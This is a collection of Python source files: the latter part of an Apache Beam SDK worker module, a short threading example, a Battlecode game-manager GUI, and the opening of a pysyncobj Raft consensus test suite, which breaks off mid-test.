self._execute(task, request)
def _request_process_bundle(self, request):
def task():
# Take the free worker. Wait till a worker is free.
worker = self.workers.get()
# Get the first work item in the queue
work = self._process_bundle_queue.get()
self._unscheduled_process_bundle.pop(work.instruction_id, None)
try:
self._execute(lambda: worker.do_instruction(work), work)
finally:
# Put the worker back in the free worker pool
self.workers.put(worker)
# Create a task for each process_bundle request and schedule it
self._process_bundle_queue.put(request)
self._unscheduled_process_bundle[request.instruction_id] = time.time()
self._process_thread_pool.submit(task)
logging.debug(
"Currently using %s threads." % len(self._process_thread_pool._threads))
def _request_process_bundle_split(self, request):
self._request_process_bundle_action(request)
def _request_process_bundle_progress(self, request):
self._request_process_bundle_action(request)
def _request_process_bundle_action(self, request):
def task():
instruction_reference = getattr(
request, request.WhichOneof('request')).instruction_reference
# only process progress/split request when a bundle is in processing.
if (instruction_reference in
self._bundle_processor_cache.active_bundle_processors):
self._execute(
lambda: self.progress_worker.do_instruction(request), request)
else:
self._execute(lambda: beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id, error=(
'Process bundle request not yet scheduled for instruction {}' if
instruction_reference in self._unscheduled_process_bundle else
'Unknown process bundle instruction {}').format(
instruction_reference)), request)
self._progress_thread_pool.submit(task)
def _request_finalize_bundle(self, request):
def task():
# Get one available worker.
worker = self.workers.get()
try:
self._execute(
lambda: worker.do_instruction(request), request)
finally:
# Put the worker back in the free worker pool.
self.workers.put(worker)
self._process_thread_pool.submit(task)
def _monitor_process_bundle(self):
"""
Monitor the unscheduled bundles and log if a bundle is not scheduled for
more than SCHEDULING_DELAY_THRESHOLD_SEC.
"""
while self._alive:
time.sleep(SdkHarness.SCHEDULING_DELAY_THRESHOLD_SEC)
# Check for bundles to be scheduled.
if self._unscheduled_process_bundle:
current_time = time.time()
for instruction_id in self._unscheduled_process_bundle:
request_time = None
try:
request_time = self._unscheduled_process_bundle[instruction_id]
except KeyError:
pass
if request_time:
scheduling_delay = current_time - request_time
if scheduling_delay > SdkHarness.SCHEDULING_DELAY_THRESHOLD_SEC:
logging.warn('Unable to schedule instruction %s for %s',
instruction_id, scheduling_delay)
class BundleProcessorCache(object):
"""A cache for ``BundleProcessor``s.
``BundleProcessor`` objects are cached by the id of their
``beam_fn_api_pb2.ProcessBundleDescriptor``.
Attributes:
fns (dict): A dictionary that maps bundle descriptor IDs to instances of
``beam_fn_api_pb2.ProcessBundleDescriptor``.
state_handler_factory (``StateHandlerFactory``): Used to create state
handlers to be used by a ``bundle_processor.BundleProcessor`` during
processing.
data_channel_factory (``data_plane.DataChannelFactory``)
active_bundle_processors (dict): A dictionary, indexed by instruction IDs,
containing ``bundle_processor.BundleProcessor`` objects that are currently
active processing the corresponding instruction.
cached_bundle_processors (dict): A dictionary, indexed by bundle processor
id, of cached ``bundle_processor.BundleProcessor`` that are not currently
performing processing.
"""
def __init__(self, state_handler_factory, data_channel_factory, fns):
self.fns = fns
self.state_handler_factory = state_handler_factory
self.data_channel_factory = data_channel_factory
self.active_bundle_processors = {}
self.cached_bundle_processors = collections.defaultdict(list)
def register(self, bundle_descriptor):
"""Register a ``beam_fn_api_pb2.ProcessBundleDescriptor`` by its id."""
self.fns[bundle_descriptor.id] = bundle_descriptor
def get(self, instruction_id, bundle_descriptor_id):
try:
# pop() is threadsafe
processor = self.cached_bundle_processors[bundle_descriptor_id].pop()
except IndexError:
processor = bundle_processor.BundleProcessor(
self.fns[bundle_descriptor_id],
self.state_handler_factory.create_state_handler(
self.fns[bundle_descriptor_id].state_api_service_descriptor),
self.data_channel_factory)
self.active_bundle_processors[
instruction_id] = bundle_descriptor_id, processor
return processor
def lookup(self, instruction_id):
return self.active_bundle_processors.get(instruction_id, (None, None))[-1]
def discard(self, instruction_id):
self.active_bundle_processors[instruction_id][1].shutdown()
del self.active_bundle_processors[instruction_id]
def release(self, instruction_id):
descriptor_id, processor = self.active_bundle_processors.pop(instruction_id)
processor.reset()
self.cached_bundle_processors[descriptor_id].append(processor)
def shutdown(self):
for instruction_id in self.active_bundle_processors:
self.active_bundle_processors[instruction_id][1].shutdown()
del self.active_bundle_processors[instruction_id]
for cached_bundle_processors in self.cached_bundle_processors.values():
while len(cached_bundle_processors) > 0:
cached_bundle_processors.pop().shutdown()
class SdkWorker(object):
def __init__(self, bundle_processor_cache, profiler_factory=None):
self.bundle_processor_cache = bundle_processor_cache
self.profiler_factory = profiler_factory
def do_instruction(self, request):
request_type = request.WhichOneof('request')
if request_type:
# E.g. if register is set, this will call self.register(request.register))
return getattr(self, request_type)(getattr(request, request_type),
request.instruction_id)
else:
raise NotImplementedError
def register(self, request, instruction_id):
"""Registers a set of ``beam_fn_api_pb2.ProcessBundleDescriptor``s.
This set of ``beam_fn_api_pb2.ProcessBundleDescriptor`` come as part of a
``beam_fn_api_pb2.RegisterRequest``, which the runner sends to the SDK
worker before starting processing to register stages.
"""
for process_bundle_descriptor in request.process_bundle_descriptor:
self.bundle_processor_cache.register(process_bundle_descriptor)
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
register=beam_fn_api_pb2.RegisterResponse())
def process_bundle(self, request, instruction_id):
bundle_processor = self.bundle_processor_cache.get(
instruction_id, request.process_bundle_descriptor_reference)
try:
with bundle_processor.state_handler.process_instruction_id(
instruction_id):
with self.maybe_profile(instruction_id):
delayed_applications, requests_finalization = (
bundle_processor.process_bundle(instruction_id))
response = beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
residual_roots=delayed_applications,
metrics=bundle_processor.metrics(),
monitoring_infos=bundle_processor.monitoring_infos(),
requires_finalization=requests_finalization))
# Don't release here if finalize is needed.
if not requests_finalization:
self.bundle_processor_cache.release(instruction_id)
return response
except: # pylint: disable=broad-except
# Don't re-use bundle processors on failure.
self.bundle_processor_cache.discard(instruction_id)
raise
def process_bundle_split(self, request, instruction_id):
processor = self.bundle_processor_cache.lookup(
request.instruction_reference)
if processor:
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle_split=processor.try_split(request))
else:
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
error='Instruction not running: %s' % instruction_id)
def process_bundle_progress(self, request, instruction_id):
# It is an error to get progress for a not-in-flight bundle.
processor = self.bundle_processor_cache.lookup(
request.instruction_reference)
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle_progress=beam_fn_api_pb2.ProcessBundleProgressResponse(
metrics=processor.metrics() if processor else None,
monitoring_infos=processor.monitoring_infos() if processor else []))
def finalize_bundle(self, request, instruction_id):
processor = self.bundle_processor_cache.lookup(
request.instruction_reference)
if processor:
try:
finalize_response = processor.finalize_bundle()
self.bundle_processor_cache.release(request.instruction_reference)
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
finalize_bundle=finalize_response)
except:
self.bundle_processor_cache.discard(request.instruction_reference)
raise
else:
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
error='Instruction not running: %s' % instruction_id)
def stop(self):
self.bundle_processor_cache.shutdown()
@contextlib.contextmanager
def maybe_profile(self, instruction_id):
if self.profiler_factory:
profiler = self.profiler_factory(instruction_id)
if profiler:
with profiler:
yield
else:
yield
else:
yield
class StateHandlerFactory(with_metaclass(abc.ABCMeta, object)):
"""An abstract factory for creating ``DataChannel``."""
@abc.abstractmethod
def create_state_handler(self, api_service_descriptor):
"""Returns a ``StateHandler`` from the given ApiServiceDescriptor."""
raise NotImplementedError(type(self))
@abc.abstractmethod
def close(self):
"""Close all channels that this factory owns."""
raise NotImplementedError(type(self))
class GrpcStateHandlerFactory(StateHandlerFactory):
"""A factory for ``GrpcStateHandler``.
Caches the created channels by ``state descriptor url``.
"""
def __init__(self, credentials=None):
self._state_handler_cache = {}
self._lock = threading.Lock()
self._throwing_state_handler = ThrowingStateHandler()
self._credentials = credentials
def create_state_handler(self, api_service_descriptor):
if not api_service_descriptor:
return self._throwing_state_handler
url = api_service_descriptor.url
if url not in self._state_handler_cache:
with self._lock:
if url not in self._state_handler_cache:
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size is
# controlled in a layer above.
options = [('grpc.max_receive_message_length', -1),
('grpc.max_send_message_length', -1)]
if self._credentials is None:
logging.info('Creating insecure state channel for %s.', url)
grpc_channel = GRPCChannelFactory.insecure_channel(
url, options=options)
else:
logging.info('Creating secure state channel for %s.', url)
grpc_channel = GRPCChannelFactory.secure_channel(
url, self._credentials, options=options)
logging.info('State channel established.')
# Add workerId to the grpc channel
grpc_channel = grpc.intercept_channel(grpc_channel,
WorkerIdInterceptor())
self._state_handler_cache[url] = GrpcStateHandler(
beam_fn_api_pb2_grpc.BeamFnStateStub(grpc_channel))
return self._state_handler_cache[url]
def close(self):
logging.info('Closing all cached gRPC state handlers.')
for _, state_handler in self._state_handler_cache.items():
state_handler.done()
self._state_handler_cache.clear()
class ThrowingStateHandler(object):
"""A state handler that errors on any requests."""
def blocking_get(self, state_key, instruction_reference):
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor without '
'out state ApiServiceDescriptor for instruction %s and state key %s.'
% (state_key, instruction_reference))
def blocking_append(self, state_key, data, instruction_reference):
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor without '
'out state ApiServiceDescriptor for instruction %s and state key %s.'
% (state_key, instruction_reference))
def blocking_clear(self, state_key, instruction_reference):
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor without '
'out state ApiServiceDescriptor for instruction %s and state key %s.'
% (state_key, instruction_reference))
class GrpcStateHandler(object):
_DONE = object()
def __init__(self, state_stub):
self._lock = threading.Lock()
self._state_stub = state_stub
self._requests = queue.Queue()
self._responses_by_id = {}
self._last_id = 0
self._exc_info = None
self._context = threading.local()
self.start()
@contextlib.contextmanager
def process_instruction_id(self, bundle_id):
if getattr(self._context, 'process_instruction_id', None) is not None:
raise RuntimeError(
'Already bound to %r' % self._context.process_instruction_id)
self._context.process_instruction_id = bundle_id
try:
yield
finally:
self._context.process_instruction_id = None
def start(self):
self._done = False
def request_iter():
while True:
request = self._requests.get()
if request is self._DONE or self._done:
break
yield request
responses = self._state_stub.State(request_iter())
def pull_responses():
try:
for response in responses:
self._responses_by_id[response.id].set(response)
if self._done:
break
except: # pylint: disable=bare-except
self._exc_info = sys.exc_info()
raise
reader = threading.Thread(target=pull_responses, name='read_state')
reader.daemon = True
reader.start()
def done(self):
self._done = True
self._requests.put(self._DONE)
def blocking_get(self, state_key, continuation_token=None):
response = self._blocking_request(
beam_fn_api_pb2.StateRequest(
state_key=state_key,
get=beam_fn_api_pb2.StateGetRequest(
continuation_token=continuation_token)))
return response.get.data, response.get.continuation_token
def blocking_append(self, state_key, data):
self._blocking_request(
beam_fn_api_pb2.StateRequest(
state_key=state_key,
append=beam_fn_api_pb2.StateAppendRequest(data=data)))
def blocking_clear(self, state_key):
self._blocking_request(
beam_fn_api_pb2.StateRequest(
state_key=state_key,
clear=beam_fn_api_pb2.StateClearRequest()))
def _blocking_request(self, request):
request.id = self._next_id()
request.instruction_reference = self._context.process_instruction_id
self._responses_by_id[request.id] = future = _Future()
self._requests.put(request)
while not future.wait(timeout=1):
if self._exc_info:
t, v, tb = self._exc_info
raise_(t, v, tb)
elif self._done:
raise RuntimeError()
del self._responses_by_id[request.id]
response = future.get()
if response.error:
raise RuntimeError(response.error)
else:
return response
def _next_id(self):
self._last_id += 1
return str(self._last_id)
class _Future(object):
"""A simple future object to implement blocking requests.
"""
def __init__(self):
self._event = threading.Event()
def wait(self, timeout=None):
return self._event.wait(timeout)
def get(self, timeout=None):
if self.wait(timeout):
return self._value
else:
raise LookupError()
def set(self, value):
self._value = value
self._event.set()
|
thread_sample.py
|
import logging
import threading
import time
def thread_function(name):
logging.info("Thread %s: starting", name)
for i in range(1000000000):
pass
# time.sleep(2)
logging.info("Thread %s: finishing", name)
if __name__ == "__main__":
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO,
datefmt="%H:%M:%S")
logging.info("Main : before creating thread")
x = threading.Thread(target=thread_function, args=(1,))
logging.info("Main : before running thread")
x.start()
logging.info("Main : wait for the thread to finish")
# x.join()
logging.info("Main : all done")
|
gui.py
|
import eel
import os
import battlecode_cli as cli
import threading
import sys
import json
import signal
import psutil
import player_plain
import battlecode as bc
import zipfile
import requests
import base64
target_dir = os.path.abspath(os.path.dirname(__file__))
print('Moving into', target_dir)
os.chdir(target_dir)
options = {'host':'0.0.0.0', 'port':6147, 'mode':'default'}
if sys.platform == 'win32':
options['host'] = 'localhost'
print('Starting eel')
eel.init('web')
CLIENT_ID = 'YmF0dGxlY29kZXdlYmFwcDpKQlVZOVZFNjkyNDNCWUM5MDI0Mzg3SEdWWTNBUUZL'
game = None
def get_token(username, password):
headers = {}
headers['authorization'] = "Basic " + CLIENT_ID
data = {}
data['grant_type'] = 'password'
data['username'] = username
data['password'] = password
data['client_id'] = CLIENT_ID
req = requests.post("http://www.battlecode.org/oauth/token", headers=headers, data=data)
print(req.text)
return req
@eel.expose
def upload_scrim_server(return_args):
cwd = os.getcwd()
if 'NODOCKER' in os.environ:
os.chdir('..')
else:
os.chdir('/player')
os.chdir(return_args['file_name'])
zip_file_name = os.path.abspath(os.path.join('../',
return_args['file_name']))
if not zip_file_name.endswith('.zip'):
zip_file_name += '.zip'
files = [f for f in os.listdir('.')]
with zipfile.ZipFile(zip_file_name, 'w', zipfile.ZIP_DEFLATED) as myzip:
for f in files:
myzip.write(f)
os.chdir(cwd)
username = return_args['username']
password = return_args['password']
req = get_token(username, password)
if req.status_code != 200:
print("Error authenticating.")
return "Error authenticating."
token = json.loads(req.text)['access_token']
headers = {}
headers['Authorization'] = 'Bearer ' + token
data = {}
data['label'] = return_args['player']
with open(zip_file_name, 'rb') as image_file:
encoded_string = base64.b64encode(image_file.read())
data['src'] = encoded_string
res = requests.post("https://battlecode.org/apis/submissions", headers=headers, data=data)
return "success"
@eel.expose
def save_logs(file_name):
if 'NODOCKER':
file_name = os.path.abspath(os.path.join('..', file_name))
else:
file_name = os.path.abspath(os.path.join('/player/', file_name))
output_string = ""
if game != None:
if all('logger' in player for player in game.players):
for i in range(len(game.players)):
player = game.players[i]
log_header = "\n\n\n\n\n\n======================================\n"
if i % 2 == 0:
log_header += "Red "
else:
log_header += "Blue "
if i < 2:
log_header += "Earth"
else:
log_header += "Mars"
log_header += "\n\n"
logs = log_header + player['logger'].logs.getvalue()
output_string += logs
else:
# This should never run. Game needs to be started to call this modal
return ""
try:
with open(file_name, 'w') as f:
f.write(output_string)
return ""
except Exception as e:
print("There was an error dumping the logs")
print(e)
return str(e)
def start_game(return_args):
global WINNER
WINNER = 0
# check mountpoint for maps first
c2 = os.path.abspath(os.path.join('/player/battlecode-maps', return_args['map']))
if 'NODOCKER' not in os.environ and os.path.exists(c2):
return_args['map'] = cli.get_map(c2)
else:
c1 = os.path.abspath(os.path.join('..', 'battlecode-maps', return_args['map']))
if os.path.exists(c1):
return_args['map'] = cli.get_map(c1)
else:
if 'testmap' not in return_args['map']:
print("Can't find map {} in {}, falling back to test map..",
return_args['map'],
os.path.abspath(os.path.join('..', 'battlecode-maps'))
)
if 'NODOCKER' not in os.environ:
print('(Also looked in /player/battlecode-maps, which should be mounted to the battlecode-maps directory of your scaffold)')
return_args['map'] = bc.GameMap.test_map()
if 'NODOCKER' in os.environ:
return_args['docker'] = False
return_args['dir_p1'] = os.path.abspath(os.path.join('..', return_args['dir_p1']))
return_args['dir_p2'] = os.path.abspath(os.path.join('..', return_args['dir_p2']))
else:
return_args['docker'] = True
return_args['dir_p1'] = os.path.abspath(os.path.join('/player', return_args['dir_p1']))
return_args['dir_p2'] = os.path.abspath(os.path.join('/player', return_args['dir_p2']))
return_args['terminal_viewer'] = False
return_args['extra_delay'] = 0
global game
(game, dockers, sock_file) = cli.create_game(return_args)
winner = None
try:
print("Running game...")
winner = cli.run_game(game, dockers, return_args, sock_file)
finally:
cli.cleanup(dockers, return_args, sock_file)
lock.release()
if winner == 'player1':
eel.trigger_end_game(1)()
elif winner == ' player2':
eel.trigger_end_game(2)()
else:
eel.trigger_end_game(0)()
print("Ready to run next game.")
@eel.expose
def get_viewer_data(turn):
turn = int(turn)
if game != None and len(game.manager_viewer_messages) >= 1:
if turn >= len(game.manager_viewer_messages) or turn == -1:
turn = len(game.manager_viewer_messages) - 1
message = json.loads(game.manager_viewer_messages[turn])
message['turn'] = turn
return message
else:
return {'width':0, 'height': 0, 'earth' : [], 'mars': [], 'turn':0}
@eel.expose
def run_game(return_args):
if not lock.acquire(blocking=False):
return "Fail"
t1 = threading.Thread(target=start_game,args=(return_args,))
t1.start()
return "success"
@eel.expose
def get_maps():
if 'NODOCKER' in os.environ:
map_dir = os.path.abspath('../battlecode-maps')
else:
map_dir = '/battlecode/battlecode-maps'
maps = [o for o in os.listdir(map_dir)
if 'bc18map' in o or 'bc18t' in o]
maps.append('testmap.bc18map')
if 'NODOCKER' not in os.environ:
try:
for o in os.listdir('/player/battlecode-maps'):
if o not in maps:
maps.append(o)
except:
pass
return maps
@eel.expose
def get_player_dirs():
if 'NODOCKER' in os.environ:
player_dir = os.path.abspath('..')
else:
player_dir = '/player'
players = []
for o in os.listdir(player_dir):
if o.startswith('.') or o in ('battlecode', 'battlecode-manager'):
continue
full_path = os.path.join(player_dir, o)
if not os.path.isdir(full_path):
continue
if os.path.exists(os.path.join(full_path, 'run.sh')):
players.append(o)
return players
# if 0 not ended, if 1 red, 2 blue
@eel.expose
def get_player_logs():
if game != None:
if all('logger' in player for player in game.players):
logs = [player['logger'].logs.getvalue() for player in game.players]
return logs
else:
return ["", "", "", ""]
return ["NULL", "NULL", "NULL", "NULL"]
@eel.expose
def end_game():
global game
if game is not None:
game.winner = 'player3'
game.disconnected = True
game.game_over = True
return ""
def reap_children(timeout=3):
"Tries hard to terminate and ultimately kill all the children of this process."
def on_terminate(proc):
pass
# print("process {} terminated with exit code {}".format(proc, proc.returncode))
procs = psutil.Process().children(recursive=True)
# send SIGTERM
for p in procs:
p.terminate()
gone, alive = psutil.wait_procs(procs, timeout=timeout, callback=on_terminate)
if alive:
# send SIGKILL
for p in alive:
# print("process {} survived SIGTERM; trying SIGKILL" % p.pid)
p.kill()
gone, alive = psutil.wait_procs(alive, timeout=timeout, callback=on_terminate)
if alive:
# give up
for p in alive:
print("process {} survived SIGKILL; giving up" % p.pid)
@eel.expose
def stop_manager():
print("Shutting manager down.")
player_plain.reap(psutil.Process())
procs = psutil.Process().kill()
print("=== Ready! ===")
print("To play games open http://localhost:6147/run.html in your browser on Mac/Linux/WindowsPro, or http://192.168.99.100:6147/run.html on Windows10Home.")
lock = threading.Lock()
eel.start('run.html', options=options, block=False)
while True:
eel.sleep(1.0)
|
test_syncobj.py
|
from __future__ import print_function
import os
import time
import pytest
import random
import threading
import sys
import pysyncobj.pickle as pickle
import pysyncobj.dns_resolver as dns_resolver
import platform
if sys.version_info >= (3, 0):
xrange = range
from functools import partial
import functools
import struct
import logging
from pysyncobj import SyncObj, SyncObjConf, replicated, FAIL_REASON, _COMMAND_TYPE, \
createJournal, HAS_CRYPTO, replicated_sync, SyncObjException, SyncObjConsumer, _RAFT_STATE
from pysyncobj.syncobj_admin import executeAdminCommand
from pysyncobj.batteries import ReplCounter, ReplList, ReplDict, ReplSet, ReplLockManager, ReplQueue, ReplPriorityQueue
from pysyncobj.node import TCPNode
from collections import defaultdict
logging.basicConfig(format=u'[%(asctime)s %(filename)s:%(lineno)d %(levelname)s] %(message)s', level=logging.DEBUG)
_bchr = functools.partial(struct.pack, 'B')
class TEST_TYPE:
DEFAULT = 0
COMPACTION_1 = 1
COMPACTION_2 = 2
RAND_1 = 3
JOURNAL_1 = 4
AUTO_TICK_1 = 5
WAIT_BIND = 6
LARGE_COMMAND = 7
class TestObj(SyncObj):
def __init__(self, selfNodeAddr, otherNodeAddrs,
testType=TEST_TYPE.DEFAULT,
compactionMinEntries=0,
dumpFile=None,
journalFile=None,
password=None,
dynamicMembershipChange=False,
useFork=True,
testBindAddr=False,
consumers=None,
onStateChanged=None,
leaderFallbackTimeout=None):
cfg = SyncObjConf(autoTick=False, appendEntriesUseBatch=False)
cfg.appendEntriesPeriod = 0.1
cfg.raftMinTimeout = 0.5
cfg.raftMaxTimeout = 1.0
cfg.dynamicMembershipChange = dynamicMembershipChange
cfg.onStateChanged = onStateChanged
if leaderFallbackTimeout is not None:
cfg.leaderFallbackTimeout = leaderFallbackTimeout
if testBindAddr:
cfg.bindAddress = selfNodeAddr
if dumpFile is not None:
cfg.fullDumpFile = dumpFile
if password is not None:
cfg.password = password
cfg.useFork = useFork
if testType == TEST_TYPE.COMPACTION_1:
cfg.logCompactionMinEntries = compactionMinEntries
cfg.logCompactionMinTime = 0.1
cfg.appendEntriesUseBatch = True
if testType == TEST_TYPE.COMPACTION_2:
cfg.logCompactionMinEntries = 99999
cfg.logCompactionMinTime = 99999
cfg.fullDumpFile = dumpFile
if testType == TEST_TYPE.LARGE_COMMAND:
cfg.connectionTimeout = 15.0
cfg.logCompactionMinEntries = 99999
cfg.logCompactionMinTime = 99999
cfg.fullDumpFile = dumpFile
cfg.raftMinTimeout = 1.5
cfg.raftMaxTimeout = 2.5
# cfg.appendEntriesBatchSizeBytes = 2 ** 13
if testType == TEST_TYPE.RAND_1:
cfg.autoTickPeriod = 0.05
cfg.appendEntriesPeriod = 0.02
cfg.raftMinTimeout = 0.1
cfg.raftMaxTimeout = 0.2
cfg.logCompactionMinTime = 9999999
cfg.logCompactionMinEntries = 9999999
cfg.journalFile = journalFile
if testType == TEST_TYPE.JOURNAL_1:
cfg.logCompactionMinTime = 999999
cfg.logCompactionMinEntries = 999999
cfg.fullDumpFile = dumpFile
cfg.journalFile = journalFile
if testType == TEST_TYPE.AUTO_TICK_1:
cfg.autoTick = True
cfg.pollerType = 'select'
if testType == TEST_TYPE.WAIT_BIND:
cfg.maxBindRetries = 1
cfg.autoTick = True
super(TestObj, self).__init__(selfNodeAddr, otherNodeAddrs, cfg, consumers)
self.__counter = 0
self.__data = {}
@replicated
def addValue(self, value):
self.__counter += value
return self.__counter
@replicated
def addKeyValue(self, key, value):
self.__data[key] = value
@replicated_sync
def addValueSync(self, value):
self.__counter += value
return self.__counter
@replicated
def testMethod(self):
self.__data['testKey'] = 'valueVer1'
@replicated(ver=1)
def testMethod(self):
self.__data['testKey'] = 'valueVer2'
def getCounter(self):
return self.__counter
def getValue(self, key):
return self.__data.get(key, None)
def dumpKeys(self):
print('keys:', sorted(self.__data.keys()))
def singleTickFunc(o, timeToTick, interval, stopFunc):
currTime = time.time()
finishTime = currTime + timeToTick
while time.time() < finishTime:
o._onTick(interval)
if stopFunc is not None:
if stopFunc():
break
def utilityTickFunc(args, currRes, key):
currRes[key] = executeAdminCommand(args)
def doSyncObjAdminTicks(objects, arguments, timeToTick, currRes, interval=0.05, stopFunc=None):
objThreads = []
utilityThreads = []
for o in objects:
t1 = threading.Thread(target=singleTickFunc, args=(o, timeToTick, interval, stopFunc))
t1.start()
objThreads.append(t1)
if arguments.get(o) is not None:
t2 = threading.Thread(target=utilityTickFunc, args=(arguments[o], currRes, o))
t2.start()
utilityThreads.append(t2)
for t in objThreads:
t.join()
for t in utilityThreads:
t.join()
def doTicks(objects, timeToTick, interval=0.05, stopFunc=None):
threads = []
for o in objects:
t = threading.Thread(target=singleTickFunc, args=(o, timeToTick, interval, stopFunc))
t.start()
threads.append(t)
for t in threads:
t.join()
def doAutoTicks(interval=0.05, stopFunc=None):
deadline = time.time() + interval
while not stopFunc():
time.sleep(0.02)
t2 = time.time()
if t2 >= deadline:
break
_g_nextAddress = 6000 + 60 * (int(time.time()) % 600)
def getNextAddr(ipv6=False, isLocalhost=False):
global _g_nextAddress
_g_nextAddress += 1
if ipv6:
return '::1:%d' % _g_nextAddress
if isLocalhost:
return 'localhost:%d' % _g_nextAddress
return '127.0.0.1:%d' % _g_nextAddress
_g_nextDumpFile = 1
_g_nextJournalFile = 1
def getNextDumpFile():
global _g_nextDumpFile
fname = 'dump%d.bin' % _g_nextDumpFile
_g_nextDumpFile += 1
return fname
def getNextJournalFile():
global _g_nextJournalFile
fname = 'journal%d.bin' % _g_nextJournalFile
_g_nextJournalFile += 1
return fname
def test_syncTwoObjects():
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]])
o2 = TestObj(a[1], [a[0]])
objs = [o1, o2]
assert not o1._isReady()
assert not o2._isReady()
doTicks(objs, 10.0, stopFunc=lambda: o1._isReady() and o2._isReady())
o1.waitBinded()
o2.waitBinded()
o1._printStatus()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._isReady()
assert o2._isReady()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10.0, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1._isReady()
assert o2._isReady()
assert o1.getCounter() == 350
assert o2.getCounter() == 350
o1._destroy()
o2._destroy()
def test_singleObject():
random.seed(42)
a = [getNextAddr(), ]
o1 = TestObj(a[0], [])
objs = [o1, ]
assert not o1._isReady()
doTicks(objs, 3.0, stopFunc=lambda: o1._isReady())
o1._printStatus()
assert o1._getLeader().address in a
assert o1._isReady()
o1.addValue(150)
o1.addValue(200)
doTicks(objs, 3.0, stopFunc=lambda: o1.getCounter() == 350)
assert o1._isReady()
assert o1.getCounter() == 350
o1._destroy()
def test_syncThreeObjectsLeaderFail():
random.seed(12)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
states = defaultdict(list)
o1 = TestObj(a[0], [a[1], a[2]], testBindAddr=True, onStateChanged=lambda old, new: states[a[0]].append(new))
o2 = TestObj(a[1], [a[2], a[0]], testBindAddr=True, onStateChanged=lambda old, new: states[a[1]].append(new))
o3 = TestObj(a[2], [a[0], a[1]], testBindAddr=True, onStateChanged=lambda old, new: states[a[2]].append(new))
objs = [o1, o2, o3]
assert not o1._isReady()
assert not o2._isReady()
assert not o3._isReady()
doTicks(objs, 10.0, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
assert o1._isReady()
assert o2._isReady()
assert o3._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._getLeader() == o3._getLeader()
assert _RAFT_STATE.LEADER in states[o1._getLeader().address]
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10.0, stopFunc=lambda: o3.getCounter() == 350)
assert o3.getCounter() == 350
prevLeader = o1._getLeader()
newObjs = [o for o in objs if o._SyncObj__selfNode != prevLeader]
assert len(newObjs) == 2
doTicks(newObjs, 10.0, stopFunc=lambda: newObjs[0]._getLeader() != prevLeader and \
newObjs[0]._getLeader() is not None and \
newObjs[0]._getLeader().address in a and \
newObjs[0]._getLeader() == newObjs[1]._getLeader())
assert newObjs[0]._getLeader() != prevLeader
assert newObjs[0]._getLeader().address in a
assert newObjs[0]._getLeader() == newObjs[1]._getLeader()
assert _RAFT_STATE.LEADER in states[newObjs[0]._getLeader().address]
newObjs[1].addValue(50)
doTicks(newObjs, 10, stopFunc=lambda: newObjs[0].getCounter() == 400)
assert newObjs[0].getCounter() == 400
doTicks(objs, 10.0, stopFunc=lambda: sum([int(o.getCounter() == 400) for o in objs]) == len(objs))
for o in objs:
assert o.getCounter() == 400
o1._destroy()
o2._destroy()
o3._destroy()
def test_manyActionsLogCompaction():
random.seed(42)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[2]], TEST_TYPE.COMPACTION_1, compactionMinEntries=100)
o2 = TestObj(a[1], [a[2], a[0]], TEST_TYPE.COMPACTION_1, compactionMinEntries=100)
o3 = TestObj(a[2], [a[0], a[1]], TEST_TYPE.COMPACTION_1, compactionMinEntries=100)
objs = [o1, o2, o3]
assert not o1._isReady()
assert not o2._isReady()
assert not o3._isReady()
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
assert o1._isReady()
assert o2._isReady()
assert o3._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._getLeader() == o3._getLeader()
for i in xrange(0, 500):
o1.addValue(1)
o2.addValue(1)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 1000 and \
o2.getCounter() == 1000 and \
o3.getCounter() == 1000)
assert o1.getCounter() == 1000
assert o2.getCounter() == 1000
assert o3.getCounter() == 1000
assert o1._getRaftLogSize() <= 100
assert o2._getRaftLogSize() <= 100
assert o3._getRaftLogSize() <= 100
newObjs = [o1, o2]
doTicks(newObjs, 10, stopFunc=lambda: o3._getLeader() is None)
for i in xrange(0, 500):
o1.addValue(1)
o2.addValue(1)
doTicks(newObjs, 10, stopFunc=lambda: o1.getCounter() == 2000 and \
o2.getCounter() == 2000)
assert o1.getCounter() == 2000
assert o2.getCounter() == 2000
assert o3.getCounter() != 2000
doTicks(objs, 10, stopFunc=lambda: o3.getCounter() == 2000)
assert o3.getCounter() == 2000
assert o1._getRaftLogSize() <= 100
assert o2._getRaftLogSize() <= 100
assert o3._getRaftLogSize() <= 100
o1._destroy()
o2._destroy()
o3._destroy()
def onAddValue(res, err, info):
assert res == 3
assert err == FAIL_REASON.SUCCESS
info['callback'] = True
def test_checkCallbacksSimple():
random.seed(42)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[2]])
o2 = TestObj(a[1], [a[2], a[0]])
o3 = TestObj(a[2], [a[0], a[1]])
objs = [o1, o2, o3]
assert not o1._isReady()
assert not o2._isReady()
assert not o3._isReady()
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
assert o1._isReady()
